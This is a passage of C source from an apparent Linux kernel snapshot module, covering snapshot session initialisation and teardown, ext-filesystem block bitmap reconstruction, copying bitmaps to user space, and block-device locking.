	ret = start_req_handler_thread(s);
	if (ret < 0)
		goto out_unlock;
	/* push delayed bios */
	cleanup_biolist(s);
	ret = 0;

out_unlock:
	sn_thaw_bdev(s);
out_up:
	up(&s->s_sem);
	return ret;
}

static void copy_page_bits_slow(void* dst, unsigned int dstbit, void* src,
				unsigned int srcbit, unsigned int len)
{
	while (len--) {
		if (test_bit(srcbit++, src))
			set_bit(dstbit++, dst);
		else
			clear_bit(dstbit++, dst);
	}
}

/* NOTE: we assume dst and src both point to the start of a page */

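/*
 * Example: dstbit=34, srcbit=3, len=70. The slow head copy fills
 * absolute bits 34..63 bit-by-bit (headlen = 32 - (34 & 31) = 30);
 * dst is then word-aligned, so the middle loop moves 32 bits per
 * iteration (one full word here) using an unaligned 64-bit load
 * shifted by the normalized srcbit, which apparently assumes a
 * little-endian layout; the final slow copy handles the remaining
 * 70 - 30 - 32 = 8 tail bits.
 */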
static void copy_page_bits(unsigned int* dst, unsigned int dstbit,
				unsigned int* src, unsigned int srcbit,
				unsigned int len)
{
	unsigned int* srcend;
	unsigned int headlen;

	/* normalize destination ptr and bitno by 4-byte boundary */
	dst += dstbit >> 5;
	dstbit &= 31;
	headlen = 32 - dstbit;
	if (len < headlen)
		headlen = len;
	copy_page_bits_slow(dst++, dstbit, src, srcbit, headlen);
	len -= headlen;
	if (!len)
		return;
	srcbit += headlen;
	/* normalize source ptr and bitno by 4-byte boundary*/
	src += srcbit >> 5;
	srcbit &= 31;
	/* processing the full DWORD's, DWORD-count is len/32 */
	srcend = src + (len >> 5);
	for (; src != srcend; src++)
		*dst++ = *(unsigned long long*)src >> srcbit;
	/* processing the tail, tail length is low 5 bits of len */
	copy_page_bits_slow(dst, 0, src, srcbit, len & 31);
}

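/*
 * Scatter 'len' bits from the kernel buffer 'array' into the session
 * block map starting at bit dest_bit, page by page; each destination
 * page is mapped atomically only for the duration of its copy.
 */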
static void copy_block_to_bitmap(struct session_struct* s, unsigned long long dest_bit,
						unsigned int len, void* array)
{
	unsigned int src_bit;

	src_bit = 0;
	while (len) {
		struct page* page;
		void* kaddr;
		unsigned int count;
		unsigned int bitno;	/* start bit on destination page */

		page = blkmap_page(s->s_blkmap.blkmap,
					dest_bit >> (PAGE_SHIFT + 3));
		bitno = dest_bit & (BITS_ON_PAGE - 1);
		count = BITS_ON_PAGE - bitno;
		if (count > len)
			count = len;
		kaddr = sn_kmap_atomic(page);
		copy_page_bits(kaddr, bitno, array, src_bit, count);
		sn_kunmap_atomic(kaddr);
		dest_bit += count;
		src_bit += count;
		len -= count;
	}
}

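/*
 * Reconstruct the ext2/3/4 block bitmap from the cached bitmap blocks:
 * each cached block is one group's on-disk bitmap, its group number is
 * derived from the block number, and its bits are copied into the
 * session block map at the group's starting bit. Returns the number of
 * bitmap blocks consumed, or -1 on allocation failure.
 */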
static int compute_bitmap_ext2(struct session_struct *s)
{
	unsigned long long fblock;	/* first data block */
	unsigned int bpgroup;		/* blocks per group */
	unsigned int lgroup; 		/* last group */
	struct page* block_page;
	void* block;
	unsigned int count;

	count = 0;
	fblock = s->s_fblock;
	lgroup = s->s_gcount - 1;
	bpgroup = s->s_bpgroup;

	block_page = alloc_page(GFP_KERNEL);
	if (!block_page)
		return -1;
	block = page_address(block_page);
	while (1) {
		unsigned long long group;
		unsigned long long cblock;	/* current block */
		unsigned long long gstart_bit;
		int copy_count;

		cblock = any_block_in_cache(s);
		if (cblock == ~0ULL)
			break;
		group = cblock;
		gstart_bit = cblock - do_div(group, bpgroup) + fblock;
		if (sa_cache_read(s, block, cblock, 0, SNAP_READ_ONCE)
							!= s->s_bsize)
			break;
		count++;
		copy_count = bpgroup;
		if (group == lgroup)
			copy_count = s->s_blkmap.size - gstart_bit;
		copy_block_to_bitmap(s, gstart_bit, copy_count, block);
	}

	page_cache_release(block_page);
	return count;
}

static int copy_bitmap_to_user(struct session_struct *s, char* bitmap)
{
	void* taddr;
	struct page* tpage;
	int ret;
	unsigned int pageno;
	unsigned long long bytes;

	ret = -ENOMEM;
	bytes = (s->s_blkmap.size + 7) >> 3;
	tpage = alloc_page(GFP_KERNEL);
	if (!tpage)
		goto out;
	taddr = page_address(tpage);
	ret = 0;
	for (pageno = 0; bytes; bitmap += PAGE_SIZE, pageno++) {
		unsigned int copy_count;
		struct page* page;
		char *kaddr;

		page = blkmap_page(s->s_blkmap.blkmap, pageno);
		/* checking for last group */
		copy_count = bytes > PAGE_SIZE ? PAGE_SIZE : bytes;
		if (page) {
			kaddr = sn_kmap_atomic(page);
			memcpy(taddr, kaddr, copy_count);
			sn_kunmap_atomic(kaddr);
		} else
			memset(taddr, 0, PAGE_SIZE);
		ret = copy_to_user(bitmap, taddr, copy_count);
		if (ret) {
			ret = -EACCES;
			break;
		}
		bytes -= copy_count;
	}

out:
	if (tpage)
		page_cache_release(tpage);
	return ret;
}

static int check_session_params(struct session_struct *s)
{
	if (s->s_state != SNAP_FROZEN) {
		sa_warn("Session must be frozen (state=%d)\n", s->s_state);
		return -EINVAL;
	}

	if (!s->s_sb && !s->s_simulate_freeze) {
		sa_warn("No superblock info for s=%p\n", s);
		return -EINVAL;
	}

	if (s->s_sb && strncmp(s->s_sb->s_type->name, "ext", 3)) {
		sa_warn("Invalid partition type (%s)\n", s->s_sb->s_type->name);
		return -EINVAL;
	}
	return 0;
}

#ifdef USE_VZ_VZSNAP
static int vzsnap_getmap(struct session_struct* s)
{
	int ret;

	ret = -EINVAL;
	sn_set_mb(s->s_state, SNAP_MAP_ERR);
	if (s->s_vzs)
		return ret;
	s->s_vzs = vzsnap_get_map(s->s_veid, s->s_bdev);
	if (s->s_vzs == NULL) {
		vzsnap_release_map(s->s_vzs);
		return ret;
	}
	ret = block_map_init_vzsnap(s, s->s_vzs);
	vzsnap_release_map(s->s_vzs);
	s->s_vzs = NULL;
	if (ret)
		return ret;
	sn_set_mb(s->s_state, SNAP_FROZEN);
	return 0;
}
#endif //USE_VZ_VZSNAP

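/*
 * First stage of snapshot setup on a frozen device: initialize the
 * session block map (apparently seeded with the locations of the
 * on-disk group bitmap blocks), switch to SNAP_READINGMAP so that
 * overwritten blocks are saved to the cache, thaw the device, read
 * every marked bitmap block, then re-freeze, fold the cached bitmap
 * blocks into the final block map and copy it to user space.
 */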
static int session_getmap(struct session_struct *s, unsigned long long size,
		void* bitmap, unsigned long bsize, unsigned long fblock,
		unsigned long bpgroup, unsigned long gcount)
{
	int ret;
	int pended;
	int bcount;
	unsigned long long bno;

	sa_debug(DEBUG_API, "s=%p size=%llu, bmap=%p, bsize=%lu, fblock=%lu,"
			" bpgroup=%lu, gcount=%lu\n", s, size, bitmap, bsize,
			fblock, bpgroup, gcount);
	bcount = 0;
	ret = -EINVAL;
	if (!bitmap || !size)
		return ret;

	down(&s->s_sem);
	ret = check_session_params(s);
	if (ret)
		goto out_up;

	s->s_fblock = fblock;
	s->s_gcount = gcount;
	s->s_bpgroup = bpgroup;
	s->s_bmsize = size;

	sn_set_mb(s->s_state, SNAP_INITINGMAP);
	sa_heartbeat_stop(s);
#ifdef USE_VZ_VZSNAP
	if (s->s_veid) {
		ret = vzsnap_getmap(s);
		if (ret)
			goto out_thaw;
		goto out_copy;
	}
#endif
	ret = block_map_init(s, size, bitmap, 0);
	if (ret) {
		sa_warn("block_map_init failed\n");
		goto out_thaw;
	}
	simulate_ioctl(s);
	wait_for_users(s);
	sn_set_mb(s->s_state, SNAP_READINGMAP);
	sn_set_mb(s->s_usemap, 0);
	spin_unlock(&sessions_lock);

	ret = start_req_handler_thread(s);
	if (ret < 0)
		goto out_thaw;

	flush_biolist(s);
	sn_thaw_bdev(s);

	/* Reading bitmap from device */
	bno = 0;
	while (1) {
		bno = find_next_block(&s->s_blkmap, bno);
		if (bno == ~0ULL)
			break;
		if (sa_cache_block(s, NULL, bno, 1, &pended)) {
			sa_warn("reading bitmap: sa_cache_block(%llu)\n", bno);
			ret = -EIO;
			goto out_destroy;
		}
		simulate_ioctl(s);
		bno++;
		bcount++;
	}
	stop_req_handler_thread(s, 1);
	sn_freeze_bdev(s);
	wait_for_users(s);
	sn_set_mb(s->s_state, SNAP_FROZEN);
	spin_unlock(&sessions_lock);

	ret = compute_bitmap_ext2(s);
	if (bcount != ret) {
		sa_warn("computing bitmap: %d!=%d\n", bcount, ret);
		ret = -EPROTO;
		goto out_thaw;
	}
/*	Setting bits at start of bitmap till FirstDataBlock	*/
/*	Moved to userspace 					*/
/*	for (bno = 0; bno < fblock; bno++)
		set_block_in_map(&s->s_blkmap, bno);
*/
#ifdef USE_VZ_VZSNAP
out_copy:
#endif
	simulate_ioctl(s);
	ret = copy_bitmap_to_user(s, bitmap);
	if (ret)
		goto out_thaw;

	simulate_ioctl(s);
	sa_heartbeat_start(s);
	up(&s->s_sem);
	return 0;

out_thaw:
	sn_thaw_bdev(s);

out_destroy:
	block_map_destroy(s);
	sn_set_mb(s->s_state, SNAP_MAP_ERR);

out_up:
	up(&s->s_sem);

	return ret;
}

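/*
 * Copy 'count' bits from the kernel buffer 'src' into the user bitmap
 * 'map', starting at bit 'bitno'.  The destination may start and end
 * at arbitrary bit offsets: unaligned pieces are merged into the user
 * buffer via get_user()/put_user(), and only a byte-aligned bulk is
 * copied with copy_to_user().
 */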
static int copy_bits_to_user(unsigned long* map, unsigned long long bitno,
		unsigned long* src, unsigned int count)
{
	unsigned int rel;
	unsigned long uval;
	unsigned int offset = 0;
	int ret = 0;

	sa_debug(DEBUG_API, "map=%p bitno=%llu count=%u\n", map, bitno, count);
	if (bitno & 7) {
		/* Here the start of the target (and possibly its end) is *not*
		   byte-aligned, so we have to copy everything bit by bit. */
		map += bitno / BITS_PER_LONG;

		/* First we copy all the bits until target hits 'long' border */
		ret = get_user(uval, map);
		if (ret)
			goto out;
		for (rel = bitno & (BITS_PER_LONG - 1);
				rel < BITS_PER_LONG && offset < count; ++rel, ++offset) {
			if (test_bit(offset, src))
				set_bit(rel, &uval);
			else
				clear_bit(rel, &uval);
		}
		ret = put_user(uval, map++);
		if (ret)
			goto out;

		/* Now the target is aligned on a 'long' boundary, so we can copy
		   whole longs, stopping before the last 'long' if it is not to be
		   copied in full; its remaining bits are handled below. */
		while (count - offset >= BITS_PER_LONG) {
			uval = 0;
			for (rel = 0; rel < BITS_PER_LONG; ++rel, ++offset) {
				if (test_bit(offset, src))
					set_bit(rel, &uval);
			}
			ret = put_user(uval, map++);
			if (ret)
				goto out;
		}
	}
	else {
		/* Here the start of the target is byte-aligned, but its end may
		   still be unaligned if count & 7 != 0.  Copy all whole bytes with
		   copy_to_user() and leave the bits of the trailing partial byte
		   for the step below. */
		/* uval is the number of bits left over in that partial byte */
		uval = (bitno + count) & 7;
		if (uval < count) {
			unsigned int bcnt = (count - uval) >> 3;
			ret = copy_to_user((unsigned char*)map + (bitno >> 3), src, bcnt);
			if (ret)
				goto out;
			offset = bcnt << 3;
		}
		map += (bitno + offset) / BITS_PER_LONG;
	}

	if (offset < count) {
		/* Copy the last bits of the bitmap when the target's end is not
		   aligned on an unsigned long or byte boundary, depending on the
		   branch taken above. */
		ret = get_user(uval, map);
		if (ret)
			goto out;
		for (rel = (bitno + offset) & (BITS_PER_LONG - 1); offset < count;
							++rel, ++offset) {
			if (test_bit(offset, src))
				set_bit(rel, &uval);
			else
				clear_bit(rel, &uval);
		}
		ret = put_user(uval, map);
		if (ret)
			goto out;
	}

out:
	return ret;
}

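/*
 * Assemble the sparse per-group bitmap for userspace: groups that were
 * never cached are emitted as zero bits, cached groups are read back
 * from the block cache and merged into the user bitmap with
 * copy_bits_to_user().
 */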
static int collect_bitmap_to_user(struct session_struct* s, void* map)
{
	int ret;
	struct page* block_page;
	void* block;

	sa_debug(DEBUG_API, "s=%p map=%p\n", s, map);
	ret = 0;
	block_page = alloc_page(GFP_KERNEL);
	if (!block_page)
		return -ENOMEM;
	block = page_address(block_page);

	map_init_iterator(&s->s_groupmap);
	ret = -EINVAL;
	do {
		unsigned long long bitno;
		unsigned long copy_count;
		struct group_entry* entry;

		entry = (void*)map_iterator_get_value(&s->s_groupmap);
		BUG_ON(!entry);

		bitno = (unsigned long long)entry->group * s->s_bpgroup + s->s_fblock;

		copy_count = s->s_bpgroup;
		if (entry->group == s->s_gcount - 1)
			copy_count = s->s_bmsize - bitno;

		if (!entry->cached)
			memset(block, 0, (copy_count + 7) >> 3);
		else if (sa_cache_read(s, block, entry->bno, 0,
						SNAP_READ_ONCE) != s->s_bsize) {
			sa_warn("cache block %llu can't be read\n", entry->bno);
			map_iterator_stop(&s->s_groupmap);
			ret = -EIO;
			break;
		}

		ret = copy_bits_to_user(map, bitno, block, copy_count);
		if (ret) {
			sa_warn("copy_bits_to_user failed (%d)\n", ret);
			break;
		}
	} while (map_iterator_next(&s->s_groupmap));

	page_cache_release(block_page);
	return ret;
}

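/*
 * SNAPCTL_GETSPARSEDMAP backend.  Like session_getmap(), but only the
 * bitmap blocks of groups present in the group map are cached, so
 * uninteresting groups are never read from disk.
 */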
static int session_getsparsedmap(struct session_struct *s,
		unsigned long long size, void *bitmap, unsigned long bsize,
		unsigned long fblock, unsigned long bpgroup,
		unsigned long gcount, unsigned long groups)
{
	int ret;
	int pended;
	struct group_entry* entry;

	sa_debug(DEBUG_API, "s=%p size=%llu bsize=%lu fblock=%lu bpgroup=%lu "
			"gcount=%lu groups=%lu\n", s, size, bsize, fblock,
			bpgroup, gcount, groups);

	ret = -EINVAL;
	if (!bitmap || !size || !gcount || !s->s_sb)
		return ret;

	down(&s->s_sem);
	if (s->s_state != SNAP_FROZEN) {
		sa_warn("Session must be frozen (state=%d)\n", s->s_state);
		goto out_up;
	}

	if (strcmp(s->s_sb->s_type->name, "ext2") &&
	    strcmp(s->s_sb->s_type->name, "ext3") &&
	    strcmp(s->s_sb->s_type->name, "ext4")) {
		sa_warn("Invalid partition type (%s)\n", s->s_sb->s_type->name);
		goto out_up;
	}
	sn_set_mb(s->s_state, SNAP_INITINGMAP);

	s->s_fblock = fblock;
	s->s_gcount = gcount;
	s->s_bpgroup = bpgroup;
	s->s_bmsize = size;

	ret = map_init(s, groups, gcount);
	if (ret)
		goto out_thaw;

	simulate_ioctl(s);

	map_init_iterator(&s->s_groupmap);
	wait_for_users(s);
	sn_set_mb(s->s_state, SNAP_READINGMAP);
	sn_set_mb(s->s_usemap, 1);
	spin_unlock(&sessions_lock);

	sa_heartbeat_stop(s);
	ret = start_req_handler_thread(s);
	if (ret < 0)
		goto out_thaw;

	flush_biolist(s);
	sn_thaw_bdev(s);

	do {
		simulate_ioctl(s);
		entry = (struct group_entry*)map_iterator_get_value(&s->s_groupmap);
		BUG_ON(!entry);
		if (entry->init && !entry->cached && sa_cache_block(s, NULL,
						entry->bno, 1, &pended)) {
			sa_warn("caching block of %llu failed\n", entry->bno);
			map_iterator_stop(&s->s_groupmap);
			ret = -EIO;
			goto out_destroy;
		}

	} while (map_iterator_next(&s->s_groupmap));

	stop_req_handler_thread(s, 1);
	sn_freeze_bdev(s);
	wait_for_users(s);
	sn_set_mb(s->s_state, SNAP_FROZEN);
	spin_unlock(&sessions_lock);

	ret = collect_bitmap_to_user(s, bitmap);
	if (ret)
		goto out_thaw;

	map_free(s);
	sa_heartbeat_start(s);
	simulate_ioctl(s);
	up(&s->s_sem);
	return 0;

out_thaw:
	sn_set_mb(s->s_state, SNAP_MAP_ERR);
	sn_thaw_bdev(s);

out_destroy:
	map_free(s);
	sn_set_mb(s->s_state, SNAP_MAP_ERR);

out_up:
	up(&s->s_sem);
	return ret;
}

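/*
 * Bind a session to its block device: take a shared device reference,
 * derive the block size, sectors-per-block and partition geometry,
 * then set up the bio array, the per-session block cache and the
 * pending request queue.
 */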
static int do_init_session(struct session_struct *s, dev_t kdev, int prealloc)
{
	int ret;
	int sa_page_size;
	int max_req;
	sn_request_queue *q;

	ret = -ENODEV;
	/* sharing mode - can use 0 as holder */
	s->s_bdev = sn_blkdev_get_by_dev(kdev, BLKDEV_GET_MODE_SHARED, NULL, &s->s_bdev_container);
	if (!s->s_bdev)
		goto out;
#ifdef HAVE_BDEV_WHOLE
	if (!bdev_whole(s->s_bdev))
#else
	if (!s->s_bdev->bd_contains)
#endif
		goto out_blk_put;
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,15)
	s->s_sb = sn_get_super(s->s_bdev);
#else
	s->s_sb = user_get_super(kdev);
#endif
	sa_debug(DEBUG_INTERNALS, "s->s_sb=%p\n", s->s_sb);
	if (!s->s_sb)
	{
		s->s_bsize = PAGE_SIZE;
		s->s_bppage = PAGE_SIZE / s->s_bsize;
		s->s_simulate_freeze = 1;
	} else {
		s->s_bsize = (s->s_sb->s_blocksize > PAGE_SIZE) ? PAGE_SIZE : s->s_sb->s_blocksize;
		s->s_bppage = PAGE_SIZE / s->s_bsize;
		if (strcmp(s->s_sb->s_type->name, "vfat") == 0)
			s->s_simulate_freeze = 1;
		sn_drop_super(s->s_sb);
		s->s_sb = NULL;
	}
	s->s_spb = s->s_bsize >> 9;
	if (!s->s_spb) {
		sa_warn("Device %x has incorrect block size %d\n", kdev,
								s->s_bsize);
		goto out_blk_put;
	}
	s->s_spbshift = ffz(~s->s_spb);
	s->s_pstart = get_start_sect(s->s_bdev);
#ifdef HAVE_BDEV_IS_PARTITION
	if (bdev_is_partition(s->s_bdev))
#else
	if (s->s_bdev->bd_part)
#endif
#ifdef HAVE_BDEV_NR_SECTORS
		s->s_plen = bdev_nr_sectors(s->s_bdev);
#else
		s->s_plen = s->s_bdev->bd_part->nr_sects;
#endif
	else if (s->s_bdev->bd_disk)
		s->s_plen = get_capacity(s->s_bdev->bd_disk);
	else
		sa_warn("Can't detect device %x size.\n", kdev);

	q = bdev_get_queue(s->s_bdev);
	if (!q) {
		sa_warn("Device %x does not have a queue.\n", kdev);
		goto out_blk_put;
	}
#ifdef HAVE_QUEUE_MAX_SECTORS
	max_req = (queue_max_sectors(q) << 9) / PAGE_SIZE;
#else
	max_req = (q->max_sectors << 9) / PAGE_SIZE;
#endif

	sa_debug(DEBUG_API, "s_bsize=%d s_bppage=%d s_spb=%d s_spbshift=%d"
		" s_plen=%llu s_pstart=%llu\n",
		s->s_bsize, s->s_bppage, s->s_spb, s->s_spbshift, s->s_plen,
		s->s_pstart);

	ret = -ENOMEM;

	s->s_bioarr = (struct bio***)get_zeroed_page(GFP_KERNEL);
	if (!s->s_bioarr)
		goto out_blk_put;
	inc_get_pages(s);

	sprintf(s->s_blkcachename, "snapapi_blk_%lu", (unsigned long)atomic_inc_return(&slab_uid));
	sa_page_size = sizeof(struct sa_page) +
				sizeof(unsigned long long) * (s->s_bppage - 1);
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,23)
	s->s_blkcachep = kmem_cache_create(s->s_blkcachename, sa_page_size,
								0, 0, 0, NULL);
#else
	s->s_blkcachep = kmem_cache_create(s->s_blkcachename, sa_page_size,
					0, 0, (void*)sn_get_blkcache_ctor(s->s_bppage));
#endif
	if (!s->s_blkcachep)
		goto out_free;

	ret = sa_blkchains_init(s);
	if (ret)
		goto out_destroy_blkchains;

	ret = sa_cache_emlist_init(s, prealloc);
	if (ret)
		goto out_destroy;

	s->s_maxmsize = MAX_MMPAGES;
	s->s_ahead_bno = ~0ULL;
	/* pending queue init */
	s->s_pending_queue.pq_req = NULL;
	s->s_pending_queue.pq_reqtail = NULL;
	s->s_pending_queue.pq_state = 0;
	init_completion(&s->s_pending_queue.pq_done);
	init_completion(&s->s_pending_queue.pq_bio_done);
	atomic_set(&s->s_pending_queue.pq_ready_req, 0);
	atomic_set(&s->s_pending_queue.pq_notready_req, 0);
	s->s_pending_queue.pq_state = PQ_STOPPED;

	sn_set_mb(s->s_state, SNAP_INITED);
	return 0;

out_destroy:
	sa_cache_emlist_destroy(s);
out_destroy_blkchains:
	sa_blkchains_destroy(s);
out_free:
	free_page((unsigned long)s->s_bioarr);
	inc_put_pages(s);
	s->s_bioarr = NULL;
out_blk_put:
	sn_blkdev_put_by_dev(s->s_bdev, FMODE_READ, NULL, s->s_bdev_container);
out:
	sn_set_mb(s->s_state, SNAP_NOTINITED);
	s->s_bdev = NULL;
	return ret;
}

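/* Release the pages backing the session's mmap window together with
 * the local bio_req array allocated in snapapi_mmap(). */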
static void mpages_destroy(struct session_struct *s)
{
	int i;
	sa_debug(DEBUG_API, "s=%p\n", s);

	for (i = 0; i < s->s_msize; i++) {
		struct page * page;
		page = s->s_mpages[i];
		if (page) {
			sa_debug(DEBUG_INTERNALS, "s=%p, i=%d, page=%p(%d)\n",
						s, i, page, page_count(page));
			page_cache_release(page);
			inc_put_pages(s);
			s->s_mpages[i] = NULL;
		}
	}
	if (s->s_local_bios) {
		sa_debug(DEBUG_INTERNALS, "s=%p, free local_bios(%p)\n",
					s, s->s_local_bios);
		kfree(s->s_local_bios);
	}

	s->s_local_bios = NULL;
	s->s_msize = 0;
}

#define	DL_READ 0
#define	DL_WRITE 1

static const char* devlock_name(unsigned lock_type)
{
	return lock_type == DL_WRITE ? "write" : "read";
}

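/*
 * Device locks handed out to sessions.  The global 'devlocked' page
 * holds up to MAX_LOCKEDDEVS slots, keyed by (dev, session) and
 * protected by devlocked_sem.
 */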
static struct locked_dev* find_lockeddev(struct session_struct* s,
					dev_t dev)
{
	struct locked_dev* idev, *end;

	end = devlocked + MAX_LOCKEDDEVS;
	for (idev = devlocked; idev != end; idev++)
		if (idev->dev == dev && idev->sess == s)
			return idev;
	return NULL;
}

static struct locked_dev* create_lockeddev(struct session_struct* s,
			struct block_device *bdev, dev_t dev, unsigned lock_type, void *container)
{
	struct locked_dev* idev, *end;
	end = devlocked + MAX_LOCKEDDEVS;
	for (idev = devlocked; idev != end; idev++)
		if (!idev->dev) {
			idev->dev = dev;
			idev->bdev = bdev;
			idev->sess = s;
			idev->lock_type = lock_type;
			idev->bdev_container = container;
			lockedcnt++;
			return idev;
		}
	return NULL;
}

static void remove_lockeddev(struct locked_dev* ldev)
{
	memset(ldev, 0, sizeof(struct locked_dev));
	lockedcnt--;
}

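/* A device with an active superblock is mounted somewhere: refuse to
 * lock it exclusively. */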
static int _sn_lockdev_check_sb(struct block_device *bdev)
{
	struct super_block *sb;
	sb = sn_get_super(bdev);
	if (sb) {
		sn_drop_super(sb);
		return -EBUSY;
	}
	return 0;
}

#ifdef HAVE_BD_CLAIM
#define sn_bd_claim(a, b) bd_claim(a, b)
#define sn_bd_release(a) bd_release(a)
#else
#define sn_bd_claim(a, b) 0
#define sn_bd_release(a)
#endif

static int _sn_lockdev(dev_t dev, void* holder, struct block_device **rbdev, void **container)
{
	int ret;
	ret = -ENODEV;
	/* excl mode - use outself as holder */
	*rbdev = sn_blkdev_get_by_dev(dev, BLKDEV_GET_MODE_EXCL, _sn_lockdev, container);
	if (!*rbdev)
		return ret;

	ret = _sn_lockdev_check_sb(*rbdev);
	if (ret) {
		sn_blkdev_put_by_dev(*rbdev, BLKDEV_GET_MODE_EXCL, NULL, container);
		return ret;
	}

	ret = sn_bd_claim(*rbdev, holder);
	if (ret) {
		sn_blkdev_put_by_dev(*rbdev, BLKDEV_GET_MODE_EXCL, NULL, container);
		return ret;
	}
	return 0;
}

static void _sn_unlockdev(struct block_device *bdev, void *container)
{
	sn_bd_release(bdev);
	sn_blkdev_put_by_dev(bdev, BLKDEV_GET_MODE_EXCL, NULL, container);
}

static int session_lockdev(struct session_struct *s, dev_t dev,
						unsigned lock_type)
{
	int ret;
	struct locked_dev* ldev;
	struct block_device *bdev;
	void *holder;
	void *bdev_container;

	sa_debug(DEBUG_API, "s=%p, dev=%x, type=%s\n", s,
			dev, devlock_name(lock_type));
	ret = -ENOMEM;

	down(&devlocked_sem);
	if (lockedcnt >= MAX_LOCKEDDEVS || !devlocked)
		goto out_up;
	ret = -ENODEV;
	ldev = find_lockeddev(s, dev);
	if (ldev) {
		ret = -EEXIST;
		sa_warn("Device %X already have %s-lock for session %p.\n",
			dev, devlock_name(ldev->lock_type), s);
		goto out_up;
	}

	holder = lock_type == DL_WRITE ? s : (void *)session_lockdev;
	bdev_container = NULL;
	ret = _sn_lockdev(dev, holder, &bdev, &bdev_container);
	if (ret)
		goto out_up;

	ldev = create_lockeddev(s, bdev, dev, lock_type, bdev_container);
	if (!ldev) {
		sa_warn("All devlocked slots are exhausted\n");
		ret = -ENOMEM;
		goto out_release;
	}
	up(&devlocked_sem);
	return 0;

out_release:
	_sn_unlockdev(bdev, bdev_container);
out_up:
	up(&devlocked_sem);
	return ret;
}

static int session_unlockdev(struct session_struct *s, dev_t dev,
						unsigned lock_type)
{
	int ret;
	struct locked_dev* ldev;

	sa_debug(DEBUG_API, "s=%p, dev=%x, type=%s\n", s,
			dev, devlock_name(lock_type));
	ret = -ENOMEM;
	down(&devlocked_sem);
	if (!devlocked)
		goto out_up;
	ret = -ESRCH;
	ldev = find_lockeddev(s, dev);
	if (!ldev) {
		sa_warn("No lock for device (%X) in session (%p)\n", dev, s);
		goto out_up;
	}
	ret = -EINVAL;
	if (ldev->lock_type != lock_type) {
		sa_warn("Lock for device (%X) in session (%p) is of type %s\n",
			dev, s, devlock_name(lock_type));
		goto out_up;
	}

	_sn_unlockdev(ldev->bdev, ldev->bdev_container);

	remove_lockeddev(ldev);
	ret = 0;

out_up:
	up(&devlocked_sem);
	return ret;
}

static void unlock_sessiondevs(struct session_struct *s)
{
	struct locked_dev* idev, *end;

	sa_debug(DEBUG_API, "\n");

	down(&devlocked_sem);
	if (!devlocked)
		goto out_up;
	end = devlocked + MAX_LOCKEDDEVS;

	for (idev = devlocked; idev != end; idev++) {
		if (!idev->bdev || idev->sess != s)
			continue;
		_sn_unlockdev(idev->bdev, idev->bdev_container);
		remove_lockeddev(idev);
	}
out_up:
	up(&devlocked_sem);
}

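/*
 * Attach per-process ioctl accounting to the session: reuse the slot
 * already assigned to the current pid, or claim a free one.  Returns
 * non-zero when all MAX_PID_INFO slots are taken.
 */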
static int session_set_pidinfo(struct session_struct *s)
{
	int i;
	struct sn_pid_info* free_p = NULL;
	struct sn_pid_info* curr_p = pid_info_p;
	pid_t pid = current->pid;

	for (i = 0; i < MAX_PID_INFO; i++, curr_p++) {
		if (!curr_p->sn_pid && !free_p)
			free_p = curr_p;
		if (curr_p->sn_pid == pid) {
			atomic_inc(&curr_p->sn_refs);
			s->s_pid_info = curr_p;
			return 0;
		}
	}
	if (free_p) {
		free_p->sn_pid = pid;
		s->s_pid_info = free_p;
		atomic_inc(&free_p->sn_refs);
		return 0;
	}
	return 1;
}

static void session_reset_pidinfo(struct session_struct *s)
{
	if (!s->s_pid_info)
		return;

	if (atomic_dec_and_test(&s->s_pid_info->sn_refs)) {
		s->s_pid_info->sn_pid = 0;
		atomic_set(&s->s_pid_info->sn_ioctls, 0);
	}
	s->s_pid_info = NULL;
}

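/*
 * Tear down a session: stop the heartbeat, the make_request hook and
 * the request-handler thread, thaw the device if it is still frozen,
 * drop all caches, mapped pages and device locks, then either park the
 * session on the not-inited list or free it.
 */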
static void close_session(struct session_struct *s, int do_free)
{
	sa_debug(DEBUG_API, "s=%p\n", s);
	down(&s->s_sem);
	sa_heartbeat_stop(s);
	unregister_make_request(s);
	stop_req_handler_thread(s, 0);
	sa_debug(DEBUG_API, "s=%p, users=%d, do_free=%d\n", s,
					atomic_read(&s->s_users), do_free);
	wait_for_users(s);
	spin_unlock(&sessions_lock);
	if (s->s_state == SNAP_FROZEN) {
		sn_thaw_bdev(s);
	}
	mpages_destroy(s);
	sa_cache_emlist_destroy(s);
	cleanup_biolist(s);
	cleanup_snapshot(s);
	if (s->s_bdev) {
		sn_blkdev_put_by_dev(s->s_bdev, FMODE_READ, NULL, s->s_bdev_container);
		s->s_bdev = NULL;
	}
	block_map_destroy(s);
	sa_blkchains_destroy(s);
	unlock_sessiondevs(s);

	if (s->s_kdev != 0 && s->s_rblocks) {
		struct sn_state out;
		fill_state(s, &out);
		session_stat(&out);
	}
	spin_lock(&sessions_lock);
	list_del_init(&s->s_list);
	if (!do_free)
		list_add(&s->s_list, &notinited_list);
	session_reset_pidinfo(s);
	sn_set_mb(s->s_state, SNAP_NOTINITED);
	s->s_kdev = 0;
	spin_unlock(&sessions_lock);
	up(&s->s_sem);
	if (do_free)
		kfree(s);
}
#if 0
static int chk_conflicts(dev_t kdev)
{
	struct list_head *tmp;

	list_for_each(tmp, &sessions_list) {
		struct session_struct *s;

		s = list_entry(tmp, struct session_struct, s_list);
		/* one queue per device */
		if (MAJOR(s->s_kdev) == MAJOR(kdev))
			return 1;
	}
	return 0;
}
#endif
static int session_init(struct session_struct * s, dev_t kdev, int prealloc)
{
	int ret;

	sa_debug(DEBUG_API, "s=%p, dev=%x, prealloc=%d\n", s, kdev, prealloc);
	ret = -EBUSY;
	down(&s->s_sem);
	if (s->s_state != SNAP_NOTINITED)
		goto out;

	spin_lock(&sessions_lock);
/*
	if (chk_conflicts(kdev)) {
		spin_unlock(&sessions_lock);
		goto out;
	}
*/
	if (session_set_pidinfo(s) != 0) {
		spin_unlock(&sessions_lock);
		sa_warn("No free pid_info, max %ld, device %x\n",
						MAX_PID_INFO, kdev);
		goto out;
	}

	list_del_init(&s->s_list);
	s->s_kdev = kdev;
	sn_set_mb(s->s_state, SNAP_ININIT);
	list_add_tail(&s->s_list, &sessions_list);
	spin_unlock(&sessions_lock);
	ret = do_init_session(s, kdev, prealloc);
	if (ret) {
		spin_lock(&sessions_lock);
		list_del_init(&s->s_list);
		s->s_kdev = 0;
		session_reset_pidinfo(s);
		sn_set_mb(s->s_state, SNAP_NOTINITED);
		list_add(&s->s_list, &notinited_list);
		spin_unlock(&sessions_lock);
		goto out;
	}
	sa_kdebug("OK. kdev=%x:%x, bs=%d.\n", MAJOR(s->s_kdev), MINOR(s->s_kdev),
								s->s_bsize);
out:
	up(&s->s_sem);
	return ret;
}

